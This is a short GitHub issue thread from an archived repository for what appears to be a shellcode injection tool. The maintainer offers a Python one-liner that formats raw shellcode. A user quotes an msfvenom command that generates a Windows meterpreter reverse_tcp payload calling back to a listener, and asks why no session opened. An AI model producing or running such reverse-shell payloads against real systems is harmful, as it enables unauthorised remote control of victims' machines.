You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Mar 20, 2023. It is now read-only.
Hi the tool is not totally finished I'll add a feature that take raw shellcode file and convert it into the right format. "msfvenom -f raw" will generate raw format shellcode.
here is a python one liner that will generate the shellcode with the right format
import re
import sys
print "\x" + "\x".join(re.findall("..", open(sys.argv[1], "rb").encode("hex")))
first thanks for this great job , i'm generating shellcode using msfvenom like this:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=6667 -b '\x41\x41' -f hex
but i have no meterpreter session.. is my shellcode wrong or what!! .
The text was updated successfully, but these errors were encountered: